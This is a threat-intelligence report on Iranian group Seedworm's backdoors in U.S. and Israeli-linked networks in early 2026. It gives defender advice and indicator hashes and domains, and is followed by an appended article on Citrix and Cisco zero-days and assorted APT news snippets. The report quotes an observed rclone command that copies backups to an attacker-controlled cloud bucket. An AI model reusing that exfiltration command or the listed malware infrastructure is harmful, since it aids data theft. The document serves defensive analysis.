| SECURITY.COM
5 Mar 2026
This activity began in early February and has continued in recent days. What organizations should expect next from Iran-aligned groups and the steps they should take to guard against cyberattacks.
This activity began in early February and has continued in recent days. What organizations should expect next from Iran-aligned groups and the steps they should take to guard against cyberattacks.
Threat Intelligence
5 Mar 2026
23 Min Read
Share
Activity associated with Iranian APT group Seedworm has been spotted on the networks of multiple U.S. companies. The activity began in February 2026 and has continued in recent days.
A U.S. bank, airport, non-profit and the Israeli operations of a U.S. software company were among the targets.
We round up details of recent Iranian cyber threat activity and what defenders need to look out for.
The Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks of multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days following U.S. and Israeli military strikes on Iran that have sparked conflict in the region.
A U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada, have experienced suspicious activity on their networks in recent days and weeks. The software company is a supplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s Israel operation seeming to be the target in this activity.
A previously unknown backdoor, which we have named Dindoor, was found on the networks of the Israeli outpost of this software company, with the same backdoor seen on the networks of a U.S. bank and the Canadian non-profit organization. This backdoor leverages Deno, the secure runtime for JavaScript and TypeScript, to execute. This backdoor was signed with a certificate issued to “Amy Cherne”.
There was also an attempt to exfiltrate data from the software company using Rclone to a Wasabi cloud storage bucket. It’s not clear if this was successful.
rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x
A different, Python backdoor called Fakeset was found on the networks of the U.S. airport and non-profit. It was signed by certificates issued to “Amy Cherne” and “Donald Gay”. The Donald Gay certificate has been used previously to sign malware linked to Seedworm. The backdoor was downloaded from two servers belonging to the Backblaze cloud storage company:
gitempire.s3.us-east-005.backblazeb2.com
elvenforest.s3.us-east-005.backblazeb2.com
The Donald Gay certificate was also used to sign a sample from the malware family we call Stagecomp and which downloads the Darkcomp backdoor. The Stagecomp and the Darkcomp malware have been linked to Seedworm by vendors including Google, Microsoft and Kaspersky. While this malware wasn’t seen on the targeted networks, the use of the same certificates suggests the same actor - namely Seedworm - was behind the activity on the networks of the U.S. companies.
While it’s not known if the operations of Seedworm are disrupted by the current conflict, already having a presence on U.S. and Israeli networks prior to the current hostilities beginning means the threat group is in a potentially dangerous position to launch attacks. While we have disrupted these breaches, other organizations could still be vulnerable to attack.
Seedworm is a long-standing Iranian threat group, which usually mounts classic espionage attacks for the purposes of spying and information gathering. Active since 2017, CISA has said that Seedworm is “a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).” Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living off the land tools.
Context
On February 28, 2026, the U.S. and Israel launched a coordinated offensive military air operation targeting Iran, leading to the death of Iran’s Supreme Leader Ayatollah Ali Khamenei, who was apparently killed on March 1 when a U.S./Israeli airstrike hit his compound. Several other high-ranking Iranian officials, as well as multiple civilians, were also killed in strikes.
In retaliation, Iran launched drones and ballistic missiles at adversaries throughout the Gulf region, including targeting Israel and U.S. military and diplomatic outposts in multiple countries in the region.
Because of the heated tension in the region and ongoing attacks, it is likely Iran and its allies may also initiate cyber operations to further target their adversaries. Both Israel and Iran have a history of carrying out destructive cyberattacks, including against each other. While internet access in Iran may be disrupted by current military operations, there are cyber operatives working for the regime based in other countries.
The UK’s National Cyber Security Centre released an alert following this recent activity, stating that “Iranian state and Iran-linked cyber actors almost certainly currently maintain at least some capability to conduct cyber activity” and warning about the potential threat posed by “Iran-linked hacktivists”. Check Point also reported recently that the Handala threat group (see below) has been using the Starlink satellite network to stay online even before this most recent activity began, with the group reportedly leveraging the technology since mid-January, when a nationwide Internet shutdown was announced by Iran’s government.
Examining the cyber activity typically carried out by threat actors associated with Iran and its allies may help us predict the kinds of cyber operations we may see being executed as this conflict continues.
Iranian threat actors have become increasingly proficient in recent years. Not only has their tooling and malware improved, but they’ve also demonstrated strong social engineering capabilities, including spear-phishing campaigns and “honeytrap” operations used to build relationships with targets of interest to gain access to accounts or sensitive information.
One of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against organizations in countries it deems hostile, which at the moment would obviously include the U.S. and Israel. That creates a risk for organizations in those countries because these attacks are about sending a message rather than stealing information, which means that any organization in the country targeted could be in the firing line.
Other recent activity
Doxing Israeli officials and regional energy sector participants
Handala is an Iranian-aligned hacktivist group that is also known to operate in support of Palestine. They have been active since at least 2024. They are known for conducting attacks targeting Israeli organizations and entities perceived to support Israel by conducting phishing attacks, data theft, ransomware, extortion and destructive attacks, including the use of custom wipers. The group operates a leaks site where victim names are posted alongside stolen data and messages from the group. The group was also reportedly active on multiple underground cybercrime forums including BreachForums, Ramp and Exploit during its early days, but has since become more active on Telegram channels and X (formerly Twitter).
In December 2025, the group claimed to have compromised the mobile devices of former Israeli Prime Minister Naftali Bennett and Benjamin Netanyahu's Chief of Staff, Tzachi Braverman. The group leaked material they said they had stolen from the phones, including the contact information of prominent Israeli officials, journalists and business people, photos and videos. However, analysis by researchers disputed some of these claims, saying that the attacks appeared to be limited to Telegram accounts, and did not achieve complete phone access.
In February 2026, Handala claimed to have breached one of Israel's largest healthcare networks. Meanwhile, in March 2026, the group said it had breached Sharjah National Oil Corporation and Israel Opportunity Energy, exfiltrating more than 1.3TB of sensitive data, including confidential financial data, oil contracts and project details. The group has also made claims about breaching Saudi Arabian energy company Saudi Aramco in a post on its leaks site. However, the documents shared appeared to consist of older files that were already in circulation previously. This raises the possibility that the claim may have been exaggerated or partially fabricated, potentially representing an influence or psychological operation intended to generate attention, panic or reputation damage. The group has also posted messages claiming that Israeli Prime Minister Benjamin Netanyahu will be their next target.
Spearphishing academics and NGOs for intelligence collection
In an October 2025 campaign, Seedworm carried out a sophisticated spear-phishing attack that used a compromised mailbox to distribute a custom backdoor known as Phoenix to international organizations across the Middle East and North Africa (MENA), targeting more than 100 government entities as part of an espionage campaign.
The attackers leveraged a malicious Office attachment that has technical overlap with previously reported Seedworm attacks to deliver Phoenix. The command & control (C&C) server also reportedly hosted the PDQ remote access tool, which was used for remote access and persistence, as well as a custom browser credential stealer. It is believed the motive behind these attacks was intelligence collection, as well as persistent access, for the purposes of longer-term espionage and exfiltration.
Elsewhere, in November 2025, Seedworm was also linked to attacks that targeted academics with expertise on the Middle East and other foreign policy experts. This activity took place between June and August 2025. Suspicious spear-phishing emails impersonated Suzanne Maloney – the vice president and director of the Foreign Policy program at the Brookings Institution and an expert on Iran – using a Gmail address and a misspelled version of her name - “Suzzane Maloney.”. In the attacks, the actors started out using a benign email, which eventually led to a subsequent email that contained a malicious link to a remote access tool payload. It is likely these attacks were carried out as a means to perform espionage - more specifically, as a means to gather intelligence that could be leveraged for strategic advantage.
These attacks had TTP overlaps with other Iranian aligned groups (Smoke Sandstorm, Mint Sandstorm/Charming Kitten) but were subsequently attributed to Seedworm.
Other 2025 activity
Camera scanning for intelligence gathering
Marshtreader (Pink Sandstorm, Agrius, Agonizing Serpens) is a group that has been active since 2020 and is reportedly linked to Iran’s Ministry of Intelligence and Security (MOIS). It is known for its destructive operations against countries in the Middle East, specifically Israel, conducting attacks under multiple aliases and leveraging data leaks in order to control and shape narratives using wiper and fake ransomware malware.
In June 2025, it was reported that the group was observed scanning for vulnerable cameras using CVE-2023-6895 and CVE-2017-7921 across Israel during the June 2025 conflict using infrastructure associated with Iranian actors.
In previous conflicts, actors have been observed compromising cameras to gather intelligence to support bombing damage assessment (BDA) by providing near-real time visibility of impact from bombings and strikes. It is likely these attacks were conducted to gain similar visibility into sensitive locations to perform reconnaissance and potentially enable follow-on targeting of high value targets.
Additionally, in June 2025, a successful password-spraying attack conducted from Nord VPN infrastructure against Israeli municipal government entities was reported followed by spear-phishing attacks that contained links to a ClickFix page designed to trick users into executing malicious PowerShell to ultimately deliver a remote access tool (RAT) that can execute arbitrary commands by the attackers. It is likely the motive behind these attacks was account compromise and espionage. It is not clear what actor was behind these attacks, but the targeting of Israeli targets points to an Iranian actor as the most likely perpetrator.
DieNet DDoS attacks
DieNet is a pro-Palestinian hacktivist group that emerged on Telegram around March 2025 and announced its intention to target “outlaw sites and corrupt government platforms” using DDoS attacks.
Following the arrest of activist Mahmoud Khalil, its activities intensified, with the group claiming responsibility for multiple DDoS attacks against U.S. critical infrastructure, including energy, financial, healthcare, government, transit and communication systems.
In its attacks, the group leveraged high-volume DDoS attacks reportedly via DDoS-as-a-service infrastructure, including TCP RST, DNS amplification, TCP SYN floods and NTP amplification attacks, as well as website defacements and data breaches.
Based on reporting, its motives were likely political retaliation and service disruption.
What can we expect next?
Given Iran's history of attacks leveraging destructive wipers, distributed-denial-of-service (DDoS) and hack-and-leak attacks, the likely next steps for the nation’s cyber actors and supporters may be multiple campaigns combining high-visibility disruption for political signaling and lower-visibility access operations for strategic leverage.
Defenders should anticipate noisy activity such as DDoS attacks, defacements, and leak claims targeting government, transportation, energy and defense contractors to amplify psychological and economic pressure.
It is also likely that more capable state-aligned groups will continue credential harvesting operations, along with vulnerability exploitation and covert persistence against critical infrastructure to generate immediate impact, while also positioning themselves for potential future destructive, espionage or coercive operations.
DDoS and defacements
Given the increase in "hacktivist" activity, we predict a surge in DDoS and defacements for fast signaling and media impact, similar to what has been observed recently with Handala’s claims of targeting critical national infrastructure (CNI).
It is likely such attacks would target a range of sectors, including government portals, municipal sites, airports/ports, logistics providers, banks, telcos, media and symbolic brands.
Password spraying and mailbox compromises
Over the last year, multiple reports involving Iran-backed groups repeatedly highlighted credential attacks and mailbox compromises as a means of initial access and intelligence gathering.
Targets could include defense organizations, government, contractors and NGOs. Additionally, adjacent organizations that support base operations, including fuel, catering, logistics, and communications could also be targets of these attacks.
Leaks / intimidation operations / psyops
Hacktivists such as Handala repeatedly use leaks and claims to amplify fear and pressure even when access is only partial - this is key escalation behavior.
Potential targets of these kinds of attacks and claims would likely include healthcare, local government, airports/ports, transportation and education, as well as high-profile individuals tied to defense, politics and media.
Critical infrastructure and opportunistic attacks
Given the current escalations between the U.S. and Iran, it is likely that CNI is at high risk of attack, as well as organizations supporting these entities.
Organizations with exposed terminal operating systems, schedules and trucking/rail interfaces may be targeted, as well as passenger processing systems, baggage systems, and contractor networks. Additionally, given the high risk, other organizations that operate within sectors such as energy/fuel supply chains may be targets.
Destructive attacks
Iran has previously exhibited high capabilities in destructive potential, particularly during escalation windows.
Any attacks would likely to be focused on energy and utilities, transportation and logistics, financial sector, telecoms, healthcare, defense contractors and military suppliers.
How can defenders prepare?
Organizations should prepare by focusing on strengthening monitoring capabilities and ensure resilience across their infrastructure where possible. Early indicators such as vulnerability scanning, credential attacks and reconnaissance activity often provide an opportunity for defenders to detect intrusion attempts early in the attack chain.
DDoS and defacement campaigns
Due to the likelihood of early retaliation and intensifying psyops, defenders should expect attempts to disrupt public-facing services and monitor any internet-facing infrastructure for the following:
Spikes in HTTP requests from large, distributed IP ranges
Repeated probing of admin portals
Exploit attempts targeting web frameworks and content management systems
Scanning activity against exposed API endpoints
To prepare, organizations should look at performing the following:
Deploy web application firewalls (WAF) with updated rule sets
Enable DDoS protection via CDN or upstream filtering services
Decommission any non-essential or unused publicly accessible services
Ensure all up-to-date patches for web applications/plugins are applied regularly
Ensure website backups exist for rapid restoration, if required
Monitor underground forums, Telegram channels and social media for claims involving your organization
Credential attacks
Credential attacks are one of the most common initial access techniques used by Iranian-linked groups, which include attack attempts against multiple public-facing services.
Defenders should ensure monitoring is in place to identify patterns consistent with password-spraying attempts, such as the following:
Repeated login failure attempts across multiple users
Authentication attempts from unusual geographic locations
MFA fatigue attacks
Login attempts occurring outside of normal working hours
Vulnerability scanning and exploitation of vulnerable VPN appliances or edge infrastructure
Deployment of web shells on internet-facing servers
Credential harvesting through phishing campaigns
Organizations should review and harden any identity security mechanisms by performing the following:
Enable multi-factor authentication for all remote access
Disable legacy authentication protocols
Implement condition access policies based on location and device risk
Restrict admin logins to specific locations, where possible
Monitor identity provider logs for any anomalies
Leak campaigns and intimidation operations
Hacktivist groups often use hack-and-leak campaigns designed to gain media attention and apply psychological pressure, usually via partial data leaks and exaggerated breach claims. Security teams should watch for indicators of data staging or exfiltration, such as the following:
Unusual downloads from email systems
Unusual access to document repositories
Suspicious archive creation (e.g. ZIP, RAR) on internal systems, usually involving collection of multiple file types
Large outbound data transfers to external cloud storage platforms
Unexpected use of data-transfer applications (e.g. Rclone) in their environment
Organizations should focus on ensuring monitoring is in place for the following:
Large outbound data transfers
Implement data loss prevention (DLP) policies
Restrict access to external cloud storage platforms
Enable auditing of email and file access
Having a communications plan for potential leak claims can also help organizations respond quickly to these threats.
Attacks on critical infrastructure
Critical infrastructure organizations and companies that support military logistics may face attacks that attempt to compromise the following:
Operational Technology (OT) interfaces
Scheduled and logistics systems
Contractor networks
Remote management systems
Security teams should ensure adequate monitoring is in place for:
Abnormal access to ICS
Unexpected remote connections to operational networks
Authentication attempts targeting infrastructure management systems
Unusual configuration changes in critical systems
Vendor access and contractor networks
Organizations faced with these attacks, at a minimum, should ensure:
Network segmentation across operational technology networks
Restrict remote access to infrastructure systems
Monitor contractor VPN access
Maintain offline backups of critical configuration systems
Destructive attacks
Iran has repeatedly demonstrated its destructive capabilities in the past, with attacks such as Shamoon, which targeted Saudi Arabia's oil industry to wipe thousands of systems.
Organizations that anticipate such attacks should ensure they monitor for indicators that attackers may be preparing for a destructive operation such as:
Mass scheduled task creation
Attempts to disable security applications
Deletion of shadow copies or backup data
Unusual administrative commands executed across multiple hosts
Organizations should prioritize resilience against destructive attacks by conducting the following tasks:
Isolating backup infrastructure from production networks
Enable immutable backups
Test disaster recovery procedures regularly
Ensuring systems can be restored quickly is critical to recovering from the impact of destructive attacks.
Historical activity
Stuxnet
One of the most infamous cyber incidents to ever take place in the Middle East region was the deployment of the Stuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at the Natanz facility in Iran. Iran has claimed that this facility has been hit in strikes by Israel and the U.S. in recent days. The disruption of Iran’s nuclear program to prevent the country from developing nuclear weapons was one of the reasons given by the U.S. administration for carrying out these recent strikes. The facility was also hit in U.S. strikes in June 2025, which were believed at the time to have rendered the facility inoperable.
Stuxnet was among the first known major nation-state cyberattacks that demonstrated hackers’ ability to manipulate and even destroy physical equipment. Stuxnet was designed to cause the spinning motors at the bottom of Natanz's enrichment centrifuges to shatter. It was first published about by researchers at Symantec in 2010, after the worm spread outside of the Natanz facility and was found on private networks. Given that Stuxnet was only discovered after penetrating private networks, it is quite possible that cyber operations are currently being leveraged by and against infrastructure that we know nothing about - yet.
Reports last year indicated potential cyber warfare impacting the region then too, including an attack by pro-Israel hackers dubbed Predatory Sparrow on Iranian crypto exchange Nobitex in which the attackers drained $90 million of cryptocurrency from the exchange. There were also reports that Iranian group Damselfly was carrying out a targeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics, journalists, and security researchers (See more in Damselfly profile).
Damselfly is just one of the key cyber actors who may be active in the current conflict, potentially targeting the networks of significant institutions in other nations for espionage, disruptive or destructive purposes.
Other key actors
Druidfly
Druidfly (aka Homeland Justice, Karma) is an Iranian attack group that specializes in disk-wiping attacks. It first came to public attention after a July 2022 wiper attack on multiple targets belonging to the government of Albania. The wiper left messages directed against the Mujahideen E-Khalq (MEK), an Iranian dissident organization based in Albania. Shortly afterward, a group calling itself Homeland Justice claimed credit for the attack.
In response to the attack, Albania broke off diplomatic relations with Iran. This triggered another wave of attacks in September 2022, apparently in retaliation for Albania publicly attributing the attacks to Iran. While Homeland Justice purported to be a hacktivist outfit, the FBI later established that “Iranian state cyber actors” were responsible for the attacks.
Druidfly reappeared in 2023, when it began targeting Israel with a wiper called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is “Bibi” (See Case Study).
On June 20, 2025, when hostilities between Iran and Israel were previously at a high, we tweeted that we had seen a Druidfly wiper targeting organizations in Albania. The wiper was signed with a legitimate certificate, which was probably stolen. On the Monday following (June 23), it was reported in the media that public services in Albania’s capital Tirana had been disrupted by a cyber attack that took down the city’s official website and affected local government operations. Homeland Justice claimed credit for the attack and said it had taken down the city’s official website, exfiltrated data and wiped servers, citing the presence of MEK in the country as the reason for the attack.
Case study: Druidfly attacks on Israeli targets
Following the escalation of the conflict in Gaza in 2023, Druidfly was linked to a series of wiper attacks against multiple targets in Israel. In this case, the attacks were carried out under a persona called Karma that purports to be a hacktivist group sympathetic to the Palestinian cause.
The wiper deployed in these attacks was called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is Bibi. The wiper encrypted files on the hard disk before overwriting the master boot record (MBR) and crashing the computer. Efforts to restart the computer would fail because of the destruction of the MBR. Analysis of the wiper revealed clear anti-Israel messages within the wiper’s code.
Figure 1: Message in BibiWiper code suggesting that Israel is not a country
Figure 1: Message in BibiWiper code suggesting that Israel is not a country
Furthermore, analysis of BibiWiper by the Threat Hunter Team found clear similarities between it and wipers deployed by Druidfly during attacks against Albania in 2022 and 2023.
Tracing other tools used to initiate the BibiWiper attacks against Israel revealed the following overlap in tactics, techniques, and procedures between these attacks and earlier Druidfly attacks:
HTTPSnoop malware was previously deployed prior to the Druidfly wiping attacks
Use of the remote desktop tools AnyDesk and ScreenConnect
Use of ReGeorg web shells
Damselfly
Damselfly (aka Charming Kitten, Mint Sandstorm) is an Iranian espionage group that has been active since 2014. It was initially known for targeting Israel with attacks before it broadened its focus to include the U.S. and other countries. While the group is principally known to be involved in intelligence gathering, members of the group are also known to have participated in extortion attacks. It has been linked by multiple vendors with Iran’s Islamic Revolutionary Guard Corps (IRGC).
In March 2022, Damselfly was one of several Iranian groups reported to have moved into mounting large-scale social engineering campaigns. Consistent features of these campaigns included the use of charismatic sock puppets, lures of prospective job opportunities, solicitation by journalists, and masquerading as think tank experts seeking opinions. The attackers leveraged networks such as LinkedIn, Facebook, Twitter, and Google.
Damselfly has also been linked to an attack targeting a nuclear security expert at a U.S.-based think tank in July 2023; attacks on Israel’s transportation, logistics, and technology sectors in November 2023; as well as a January 2024 campaign targeting individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the U.S. The attackers in that campaign used bespoke phishing lures themed around the Israel-Hamas conflict to trick targets into downloading malware.
In 2025, Check Point reported that a new Damselfly campaign that began in mid-June 2025 targeted Israeli journalists, cyber security experts and computer science professors from leading Israeli universities with spear phishing campaigns in an attempt to steal credentials and multi-factor authentication codes in order to gain access to targets’ email accounts. Some of the victims were approached by attackers who posed as fictitious assistants to technology executives or researchers through emails and WhatsApp messages.
Mantis
Active since at least 2014, Mantis (aka Desert Falcon, Arid Viper, APT-C-23), is an Arabic speaking group that appears to be based in the Gaza Strip. The group is known to mount espionage attacks against targets in the government, military, media, financial, research, education, and energy sectors. Most of its attacks have been against organizations in the Middle East but it has, on occasion, attacked targets outside the region. It has also been known on occasion to target individuals or organizations internally within Gaza. While other vendors have linked the group to Hamas, the Threat Hunter Team cannot make a definitive attribution to any Palestinian organization.
The group mainly favors spear-phishing emails with malicious attachments or links to malicious files as its main infection vector. Mantis uses custom malware and its most recent toolset includes the backdoors Trojan.Micropsia and Trojan.AridGopher. Micropsia is capable of taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration. However, its main purpose appears to be running secondary payloads for the attackers. Arid Gopher is a modular backdoor that is written in Go. It appears to be regularly updated and rewritten by the attackers, most likely to evade detection.
These tools were used in a Mantis attack in late 2022/early 2023 that targeted organizations within the Palestinian territories. The initial infection vector for this campaign remains unknown, but both the Micropsia and AridGopher malware were deployed in this attack. In one intrusion, the attackers deployed three distinct versions of the same toolset (that is, different variants of the same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.
Indicators of Compromise (IOCs)
0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542 - Trojan.Dindoor
1d984d4b2b508b56a77c9a567fb7a50c858e672d56e8cf7677a1fca5c98c95d1 - Trojan.Dindoor
2a00705cfd3c15cf8913e9eb4e23968efd06f1feceaef9987d26c5518887d043 - Trojan.Dindoor
2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5 - Trojan.Dindoor
42a5db2a020155b2adb77c00cbe6c6ad27c2285d8c6114679d9d34137e870b3f - Trojan.Dindoor
7467f326677a4a2c8576e71a832e297e794ea00e9b67c4fcbe78b5aec697cec4 - Trojan.Dindoor
7c30c16e7a311dc0cdb1cdfd9ea6e502f44c027328dbe7d960b9bcd85ccf5eef - Trojan.Dindoor
b0af82de672d81f3c2f153977923b3884a8a9e7045b182c2379b19a1996931a0 - Trojan.Dindoor
bd8203ab88983bc081545ff325f39e9c5cd5eb6a99d04ae2a6cf862535c9829a - Trojan.Dindoor
c7cf1575336e78946f4fe4b0e7416b6ebe6813a1a040c54fb6ad82e72673478e - Trojan.Dindoor
077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de - Trojan.Fakeset
15061036c702ad92b56b35e42cf5dc334597e7311e98d2fdd3815a69ac3b1d84 - Trojan.Fakeset
2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6 - Trojan.Fakeset
4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be - Trojan.Fakeset
64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb - Trojan.Fakeset
64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1 - Trojan.Fakeset
74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d - Trojan.Fakeset
94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444 - Trojan.Fakeset
a4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377 - Trojan.Fakeset
a5d4d6be3bfe0cba23fe6b44984b5fc9c7c7e10030be96120bb30da0f2545d4c - Trojan.Fakeset
ddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888 - Trojan.Fakeset
24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 - Trojan.Stagecomp
A92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 - - Trojan.Stagecomp
3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90 - Trojan.Darkcomp
1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6 - Trojan.Darkcomp
Network Indicators
gitempire.s3.us-east-005.backblazeb2[.]com
elvenforest.s3.us-east-005.backblazeb2[.]com
uppdatefile[.]com
serialmenot[.]com
moonzonet[.]com
bleepingcomputer.com
By Bill Toulas
November 12, 2025
An advanced threat actor exploited the critical vulnerabilities “Citrix Bleed 2" (CVE-2025-5777) in NetScaler ADC and Gateway, and CVE-2025-20337 affecting Cisco Identity Service Engine (ISE) as zero-days to deploy custom malware.
Amazon’s threat intelligence team, analyzing “MadPot” honeypot data, found that hackers leveraged the two security issues before the security issues were disclosed publicly and patches became available.
“Our Amazon MadPot honeypot service detected exploitation attempts for the Citrix Bleed Two vulnerability (CVE-2025-5777) prior to public disclosure, indicating a threat actor had been exploiting the vulnerability as a zero-day,” explains Amazon.
“Through further investigation of the same threat exploiting the Citrix vulnerability, Amazon Threat Intelligence identified and shared with Cisco an anomalous payload targeting a previously undocumented endpoint in Cisco ISE that used vulnerable deserialization logic.”
Citrix Bleed 2 is a NetScaler ADC and Gateway out-of-bounds memory read problem that the vendor published fixes for in late June.
Although the vendor needed a longer period to confirm that the flaw was leveraged in attacks, despite multiple third-party reports claiming it was used in attacks, exploits became available in early July, and CISA tagged it as exploited.
The flaw in ISE (CVE-2025-20337), with a maximum severity score, was published on July 17, when Cisco warned that it could be exploited to let an unauthenticated attacker store malicious files, execute arbitrary code, or gain root privileges on vulnerable devices.
In less than five days, the vendor reissued its warning about CVE-2025-20337 being actively exploited. On July 28, researcher Bobby Gould published technical details in a write-up that included an exploit chain.
In a report shared with BleepingComputer, Amazon says that both flaws were leveraged in APT attacks before Cisco and Citrix published their initial security bulletins.
The hackers leveraged CVE-2025-20337 to gain pre-auth admin access to Cisco ISE endpoints, and deployed a custom web shell named ‘IdentityAuditAction,’ disguised as a legitimate ISE component.
The web shell registered as an HTTP listener to intercept all requests and used Java reflection to inject into Tomcat server threads.
It also employed DES encryption with non-standard base64 encoding for stealth, required knowledge of specific HTTP headers to access, and left minimal forensic traces behind.
The use of multiple undisclosed zero-day flaws and the advanced knowledge of Java/Tomcat internals and the Cisco ISE architecture all point to a highly resourced and advanced threat actor. However, Amazon could not attribute the activity to a known threat group.
Curiously, though, the targeting appeared indiscriminate, which doesn’t match the typically tight scope of highly targeted operations by such threat actors.
It is recommended to apply the available security updates for CVE-2025-5777 and CVE-2025-20337, and limit access to edge network devices through firewalls and layering.
Kaspersky researchers discovered previously unidentified commercial Dante spyware developed by Memento Labs (formerly Hacking Team) and linked it to the ForumTroll APT attacks.
ESET researchers publish an analysis of Spellbinder, a lateral movement tool used to perform adversary-in-the-middle attacks.<<
APT Lazarus has begun attempting to smuggle code using custom extended attributes.
Extended attributes are metadata that can be associated with files and directories in various file systems. They allow users to store additional information about a file beyond the standard attributes like file size, timestamps, and permissions.
Russia has long been a military power, a nuclear power, a space power and in recent decades, a cyber power. It has been one of the most capable cyber actors, going back to the late 1990s when Russian state hackers stole classified documents and military research from U.S. universities and government agencies. The stolen documents, if stacked on top of one another, would have been taller than the Washington Monument (555 feet or 169 meters). These incidents, dubbed “Moonlight Maze” as described in Thomas Rid’s book “Rise of the Machines,” marked one of the world’s first advanced persistent threat (APT) attacks. Russia’s intelligence and security agencies continue to operate highly skilled groups of offensive attackers. Those APT groups are spread across its intelligence and security agencies and the Ministry of Defense. They engage in a broad range of cyber and influence operations tied to Russia’s strategic objectives. These include exploiting adversary systems, establishing footholds, conducting cyber espionage operations and running disinformation and misinformation campaigns designed to undermine Western narratives. One of the most effective and long-running Russian groups is Turla, a unit known as Center 16 housed within Russia’s Federal Security Service, or FSB. Researchers found that this group, which is active today, may have been connected with Moonlight Maze.
Sophos X-Ops unveils five-year investigation tracking China-based groups targeting perimeter devices
China-linked threat actors compromised some U.S. internet service providers as part of a cyber espionage campaign code-named Salt Typhoon.
The state-sponsored hackers aimed at gathering intelligence from the targets or carrying out disruptive cyberattacks.
The Wall Street Journal reported that experts are investigating into the security breached to determine if the attackers gained access to Cisco Systems routers, which are core network components of the ISP infrastructures.
A first in our telemetry: Chinese APT Stately Taurus uses Visual Studio Code to maintain a reverse shell in victims' environments for Southeast Asian espionage. A first in our telemetry: Chinese APT Stately Taurus uses Visual Studio Code to maintain a reverse shell in victims' environments for Southeast Asian espionage.
Kaspersky discovered a new APT CloudSorcerer targeting Russian government entities and using cloud services as C2, just like the CloudWizard actor.
Cyberespionage groups have been using ransomware as a tactic to make attack attribution more challenging, distract defenders, or for a financial reward as a secondary goal to data theft.
Security researchers discovered two previously unseen backdoors dubbed LunarWeb and LunarMail that were used to compromise a European government's diplomatic institutions abroad.
ESET researchers provide technical analysis of the Lunar toolset, likely used by the Turla APT group, that infiltrated a European ministry of foreign affairs
For more than six years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. These summaries are based on our threat intelligence research. They provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.
How and why nation-state hackers and cybercriminals coexist in the same router botnet.
Within Rapid7 Labs we continually track and monitor threat groups. As part of this process, we routinely identify evolving tactics from threat groups in what is an unceasing game of cat and mouse.
MuddyC2Go framework and custom keylogger used in attack campaign.
Iranian espionage group Seedworm (aka Muddywater) has been targeting organizations operating in the telecommunications sector in Egypt, Sudan, and Tanzania.
Seedworm has been active since at least 2017, and has targeted organizations in many countries, though it is most strongly associated with attacks on organizations in the Middle East. It has been publicly stated that Seedworm is a cyberespionage group that is believed to be a subordinate part of Iran’s Ministry of Intelligence and Security (MOIS).
ESET Research discover campaigns by the Winter Vivern APT group that exploit a zero-day XSS vulnerability in the Roundcube Webmail server and target governmental entities and a think tank in Europe.
In this report Kaspersky shares insights into the validation components used in Operation Triangulation, TriangleDB implant post-compromise activity, as well as details of some additional modules.
#2023 #APT #Apple #EN #Malware #Malware-Description #Triangulation #analysis #iOS #macOS #securelist #spyware
Understanding the complex threat landscape facing businesses today from state-sponsored cyber attacks is crucial to effective cyber defense.
